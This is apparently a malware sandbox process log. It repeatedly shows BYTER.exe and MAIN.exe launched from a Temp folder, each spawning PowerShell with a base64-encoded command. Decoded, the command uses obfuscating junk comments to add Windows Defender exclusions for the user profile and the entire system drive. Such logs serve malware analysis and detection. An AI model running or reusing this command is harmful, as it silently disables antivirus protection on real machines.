"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1798402866-854451321-1498489360-1128336277-133119129215744342521431272360-200970955"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9861232508163872984715320891318032363-1319720850-2688157671497766409-228127435"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

